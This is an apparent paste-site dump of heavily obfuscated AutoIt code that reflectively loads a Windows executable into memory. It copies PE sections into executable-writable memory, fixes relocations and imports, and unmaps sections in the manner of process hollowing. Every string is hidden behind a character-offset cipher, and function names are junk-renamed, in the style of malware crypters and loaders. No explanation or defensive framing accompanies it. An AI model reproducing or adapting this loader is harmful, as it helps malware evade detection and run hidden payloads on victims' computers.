- LOCAL $IENTRYPOINT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("ecaylgmvcgunqzdwlwowleyvvmqubq","-36,1,3,-7,-7,12,6,-39,3,-34,-7,6,1,-1,-20,-8,-3,-9,5"))
- LOCAL $POPTIONALHEADERIMAGEBASE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("piklccodxnprxusmndogiunpucofod","-39,4,-10,-5,2,-33,-14,15,-19"))
- $PPOINTER+=8
- LOCAL $TIMAGE_DIRECTORY_ENTRY_IMPORT=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
- LOCAL $PADDRESSIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- LOCAL $ISIZEIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
- $PPOINTER+=8
- $PPOINTER+=24
- LOCAL $TIMAGE_DIRECTORY_ENTRY_BASERELOC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
- LOCAL $PADDRESSNEWBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- LOCAL $ISIZEBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
- $PPOINTER+=8
- $PPOINTER+=40
- $PPOINTER+=40
- LOCAL $PBASEADDRESS=0
- LOCAL $BCLEANLOAD=$HOOKEXPLOITKERNELBYPASSROOTEXPLOIT($PBASEADDRESS)
- $PBASEADDRESS=$BYPASSKERNELROOTADMINISTRATION($PBASEADDRESS,$ISIZEOFIMAGE,$MEM_RESERVE+$MEM_COMMIT,$PAGE_READWRITE)
- LOCAL $PHEADERSNEW=$HOOKROOTKERNELROOTHOOK($TIMAGE_DOS_HEADER)
- LOCAL $IOPTIONALHEADERSIZEOFHEADERS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("uajndgscxoaqvmpmlewkyvswvbncum","-34,8,16,-9,-21,-1,-43,2,-23,-11,4,1,-3"))
- $BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS,$IOPTIONALHEADERSIZEOFHEADERS,$PAGE_READWRITE)
- IF @ERROR THEN
- $KERNELROOTROOTKERNELKERNEL($PBASEADDRESS)
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(6,0,0)
- ENDIF
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PBASEADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PHEADERSNEW),1))
- LOCAL $TIMAGE_SECTION_HEADER
- LOCAL $ISIZEOFRAWDATA,$PPOINTERTORAWDATA
- LOCAL $IVIRTUALSIZE,$IVIRTUALADDRESS
- LOCAL $TIMPRAW,$TRELOCRAW
- FOR $I=1 TO $INUMBEROFSECTIONS
- $TIMAGE_SECTION_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("mojpoyssdxtpuzqpcnsiwelefhzgya","-10,-7,-9,2,-79,-43,-18,-6,1,-29,-60,-19,-58")&STRINGDEC("vbldanmbhcsltynkaortgbgkjuimps","-18,21,3,14,3,-78,-23,7,10,17,2,-11,-8,-38,-5,15,4,-52")&STRINGDEC("kkvvvluofzqkzuepcoybcytubbiggv","-7,12,-7,-4,-18,-76,-31,-6,12,-6,4,-10,-14,-52,-1,-12,15,-10,-6,17,-40")&STRINGDEC("qetrjgnlxlvegjkdznybdrcuijzsol","-13,18,-5,0,-6,-71,-27,-3,2,-7,-39,1,-21,-9,12,-32,-25,6,-24,-39")&STRINGDEC("blvsrzcrailshptfaqyyeetseetdbz","2,11,-7,-1,-14,-90,-19,-3,8,5,8,-14,10,-28,-5,-20,0,6,-53,-24,15,-4,-57")&STRINGDEC("tqkctmpbsvhhkdkgmqnibxhpkatykb","-16,6,4,15,-16,-77,-32,13,-10,-8,12,-3,7,-16,4,-21,-8,-5,1,-6,-1,-4,1,-1,3,18,-57")&STRINGDEC("nhnevjsryrvozfdrhezcxeomkkmhus","-10,15,1,13,-18,-74,-35,-3,-16,-4,-2,-10,-8,-18,11,-38,1,9,-21,11,-3,8,-13,-8,7,8,-50")&STRINGDEC("rqejsmymxcjnxkzbsbxujapidccihv","5,-2,13,-6,-83,-31,-4,0,-22,2,8,-31,-18,-25,-21,10,-4,1,-23,-1,-1,14,-2,10,-41")&STRINGDEC("sgnndtmmzqymlnyidyqlpxkocogaza","4,8,4,-10,-68,-38,8,0,-24,-12,-7,-30,-6,-34,-16,5,1,-11,4,1,-14,-19,7,4,-40")&STRINGDEC("hupkjmgzcrxevtxtowwoteiqwftdex","-4,2,-1,7,-6,-77,-36,-18,-2,0,-23,-2,-2,-15,-6,-11,4,-3,-14,-12,-1"),$PPOINTER)
- $ISIZEOFRAWDATA=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("lohkljtmkwobrarxhbfwcbacdanqnx","-25,-6,18,-6,-29,-4,-34,-12,12,-51,-14,18,-17"))
- $PPOINTERTORAWDATA=$PHEADERSNEW+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("xttkphmeylgmqkmwftqcvvtehxhceq","-40,-5,-11,3,4,-3,5,-17,-10,-26,-6,10,-45,-10,7,-22"))
- $IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- $IVIRTUALSIZE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("bolwjztsooyqtkwojkfjcewunjrbrl","-12,-6,6,-3,11,-25,-8,-32,-6,11,-20"))
- IF $IVIRTUALSIZE AND $IVIRTUALSIZE<$ISIZEOFRAWDATA THEN $ISIZEOFRAWDATA=$IVIRTUALSIZE
- $BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS+$IVIRTUALADDRESS,$IVIRTUALSIZE,$PAGE_EXECUTE_READWRITE)
- IF @ERROR THEN
- $PPOINTER+=40
- CONTINUELOOP
- ENDIF
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]"),1))
- IF $ISIZEOFRAWDATA THEN
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PPOINTERTORAWDATA),1))
- ENDIF
- IF $IVIRTUALADDRESS<=$PADDRESSIMPORT AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSIMPORT THEN
- $TIMPRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEIMPORT&"]",$PPOINTERTORAWDATA+($PADDRESSIMPORT-$IVIRTUALADDRESS))
- $BYPASSKERNELEXPLOITKERNEL($TIMPRAW,$PBASEADDRESS)
- ENDIF
- IF $IVIRTUALADDRESS<=$PADDRESSNEWBASERELOC AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSNEWBASERELOC THEN
- $TRELOCRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEBASERELOC&"]",$PPOINTERTORAWDATA+($PADDRESSNEWBASERELOC-$IVIRTUALADDRESS))
- ENDIF
- $PPOINTER+=40
- NEXT
- IF $PADDRESSNEWBASERELOC AND $ISIZEBASERELOC THEN $ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION($TRELOCRAW,$PBASEADDRESS,$POPTIONALHEADERIMAGEBASE,$IMAGIC=523)
- LOCAL $PENTRYFUNC=$PBASEADDRESS+$IENTRYPOINT
- IF $IENTRYPOINT THEN $ADMINISTRATIONADMINISTRATIONBYPASSHOOK(STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),$PENTRYFUNC,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PBASEADDRESS,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),1,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),0)
- IF $BCLEANLOAD THEN $KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION($PBASEADDRESS)
- ENDFUNC
- FUNC FIXRELOC($TDATA,$PADDRESSNEW,$PADDRESSOLD,$FIMAGEX64)
- LOCAL $IDELTA=$PADDRESSNEW-$PADDRESSOLD
- LOCAL $ISIZE=$KERNELROOTKERNELHOOKKERNELROOT($TDATA)
- LOCAL $PDATA=$HOOKROOTKERNELROOTHOOK($TDATA)
- LOCAL $TIMAGE_BASE_RELOCATION,$IRELATIVEMOVE
- LOCAL $IVIRTUALADDRESS,$ISIZEOFBLOCK,$INUMBEROFENTRIES
- LOCAL $TENRIES,$IDATA,$TADDRESS
- LOCAL $IFLAG=3+7*$FIMAGEX64
- WHILE $IRELATIVEMOVE<$ISIZE
- $TIMAGE_BASE_RELOCATION=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("lwjrdmzzfbhfvidpgcrfuusyhqgqwo","-8,0,5,0,0,-77,-36,-17,12,18,13,-5,-10,-40,0,-12,11,2,1,13,-58,-85,-15,-2,7,1,-3,-81,-36,-6,14,-18,-27,-12,-34,-1,-11,-23,5"),$PDATA+$IRELATIVEMOVE)
- $IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- $ISIZEOFBLOCK=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("bnuwrciljwllofmmhxrxtcxcwgidkq","-15,-5,5,-18,-35,3,-39,0,5,-20,-1"))
- $INUMBEROFENTRIES=($ISIZEOFBLOCK-8)/2
- $TENRIES=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ljdrmcjigcsrmjeayaoxiftpaygyrv","11,5,14,-14,-18")&$INUMBEROFENTRIES&"]",$HOOKROOTKERNELROOTHOOK($TIMAGE_BASE_RELOCATION)+8)
- FOR $I=1 TO $INUMBEROFENTRIES
- $IDATA=$KERNELBYPASSROOTADMINISTRATION($TENRIES,1,$I)
- IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($IDATA,12)=$IFLAG THEN
- $TADDRESS=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESSNEW+$IVIRTUALADDRESS+$BYPASSBYPASSHOOKEXPLOIT($IDATA,4095))
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TADDRESS,1,$KERNELBYPASSROOTADMINISTRATION($TADDRESS,1)+$IDELTA)
- ENDIF
- NEXT
- $IRELATIVEMOVE+=$ISIZEOFBLOCK
- WEND
- RETURN 1
- ENDFUNC
- FUNC FIXIMPORTS($TDATA,$HINSTANCE)
- LOCAL $PIMPORTDIRECTORY=$HOOKROOTKERNELROOTHOOK($TDATA)
- LOCAL $HMODULE,$PFUNCNAME,$TFUNCNAME,$SFUNCNAME,$PFUNCADDRESS
- LOCAL $TIMAGE_IMPORT_MODULE_DIRECTORY,$PMODULENAME,$TMODULENAME
- LOCAL $TBUFFEROFFSET2,$IBUFFEROFFSET2
- LOCAL $IINITIALOFFSET,$IINITIALOFFSET2,$IOFFSET
- LOCAL CONST $IPTRSIZE=$KERNELROOTKERNELHOOKKERNELROOT($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4")))
- WHILE 1
- $TIMAGE_IMPORT_MODULE_DIRECTORY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("oslxljafhlcqevhnveycpapujzmbxp","-11,4,3,-6,-8,-74,-15,-16,-39,-29,15,-8,2,-13,6,-13,-10,-31,-16,15,3,19,-28,-13,11,-12,-2,-39")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("dhbrrjgfaqtelpmlwzkkhrxzhyhysq","0,15,13,0,-14,-74,-33,9,17,6,-19,13,-8,-11,5,-41,-15,-25,-2,3,-45")&STRINGDEC("dilcwosqkyuaqkznzozwybrpzcyodc","0,14,3,15,-19,-79,-33,-27,-42,-44,-6,3,4,1,-21,-32,-25,-2,-21,-60")&STRINGDEC("usmbngezbsbjfvccnqokanpjizqujz","-17,4,2,16,-10,-71,-19,-36,-33,-45,7,8,13,-2,-15,5,7,-3,-4"),$PIMPORTDIRECTORY)
- IF NOT $KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))THEN EXITLOOP
- $PMODULENAME=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17"))
- $TMODULENAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("upjquvutslafzbgfjxkhknbxlzazrp","-18,-8,-9,1,-85,-40,-20,-7,-14,-17")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PMODULENAME)&"]",$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17")))
- $HMODULE=$BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS($KERNELBYPASSROOTADMINISTRATION($TMODULENAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12")))
- $IINITIALOFFSET=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))
- $IINITIALOFFSET2=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("zfbhtwtfudtxfnayqiivdgxbknheos","-40,-16,-33,-25,-2,-14,-13,3,-7,-3,-8,-50,3,4,18,-5,-29,-1,12,-8,7"))
- IF $IINITIALOFFSET2=$HINSTANCE THEN $IINITIALOFFSET2=$IINITIALOFFSET
- $IOFFSET=0
- WHILE 1
- $TBUFFEROFFSET2=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET2+$IOFFSET)
- $IBUFFEROFFSET2=$KERNELBYPASSROOTADMINISTRATION($TBUFFEROFFSET2,1)
- IF NOT $IBUFFEROFFSET2 THEN EXITLOOP
- IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($KERNELEXPLOITADMINISTRATIONROOTROOT($IBUFFEROFFSET2,$IPTRSIZE,1),7)THEN
- $PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$BYPASSBYPASSHOOKEXPLOIT($IBUFFEROFFSET2,65535))
- ELSE
- $PFUNCNAME=$HINSTANCE+$IBUFFEROFFSET2+2
- $TFUNCNAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ztupaktkcocqtjwswsimusgwiiaevm","-3,-5,-3,-12,-65,-28,-2,-7,6,-1,-2,-5,-57,-74,-20,-11,-22,-1,-73,-31,-20,-6,-2,-28")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PFUNCNAME)&"]",$HINSTANCE+$IBUFFEROFFSET2)
- $SFUNCNAME=$KERNELBYPASSROOTADMINISTRATION($TFUNCNAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12"))
- $PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$SFUNCNAME)
- ENDIF
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET+$IOFFSET),1,$PFUNCADDRESS)
- $IOFFSET+=$IPTRSIZE
- WEND
- $PIMPORTDIRECTORY+=20
- WEND
- RETURN 1
- ENDFUNC
- FUNC UNMAPVIEWOFSECTION($PADDRESS)
- LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("lolaswlneqglatvujvwqviroebtdfh","2,5,-8,11,-7,-73,-8,-2,7"),STRINGDEC("pzsmwgeaptrhqhifwxjgngsprkjntw","-7,-12,1"),STRINGDEC("egwadzchaebonrunjtdzissolfqgmo","-23,13,-34,13,9,-25,13,-18,8,0,21,-32,-8,-31,-16,-11,10,-11,11,-12"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$BYPASSHOOKHOOKHOOKKERNELHOOK(),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS)
- IF @ERROR OR $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,FALSE )
- RETURN TRUE
- ENDFUNC
- FUNC VIRTUALPROTECT($PADDRESS,$ISIZE,$IPROTECTION)
- LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),STRINGDEC("wpxbildbjcxtjlduknwzcanprgheeu","-33,-7,-6,18,12,-11,8,-18,8,12,-4,-15,-7,8"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS,STRINGDEC("qquzgqwwlawbxandwwcglmgrcbifhj","-13,6,-6,-8,-3,-18,-7,-3,6"),$ISIZE,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),$IPROTECTION,STRINGDEC("nnpgmnrtuodmqfsmzcfvlmzjmztrro","-10,9,-1,11,-9,-68"),0)
- IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
- RETURN 1
- ENDFUNC
- FUNC GETPROCADDRESS($HMODULE,$VNAME)
- LOCAL $STYPE=STRINGDEC("zdacatdoylubvdmymbssbhfdsgsgol","-7,16,17")
- IF $EXPLOITEXPLOITKERNELHOOKKERNELBYPASS($VNAME)THEN $STYPE=STRINGDEC("rygvobzahsfsgyffoyrxsigagjtisp","5,-10,11,-18")
- LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),STRINGDEC("ejkuftmguocuyhwozahfcvigcwnibd","-30,-5,9,-37,12,-5,-10,-38,-17,-11,15,-16,-6,11"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$HMODULE,$STYPE,$VNAME)
- IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
- RETURN $ACALL[0]
- ENDFUNC
- FUNC STRINGDEC($STRING,$PARAM)
- $STRING=STRINGTOASCIIARRAY($STRING)
- $PARAM=STRINGSPLIT($PARAM,",",2)
- $COUNT=0
- $RETURN=""
- FOR $I=0 TO UBOUND($PARAM)-1
- $CHAR=$PARAM[$I]
- $COMPARE=$STRING[$COUNT]
- $RETURN&=CHRW($CHAR+$COMPARE)
- IF $COUNT=UBOUND($STRING)-1 THEN
- $COUNT=0
- ELSE
- $COUNT=$COUNT+1
- ENDIF
- NEXT
- RETURN $RETURN
- ENDFUNC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement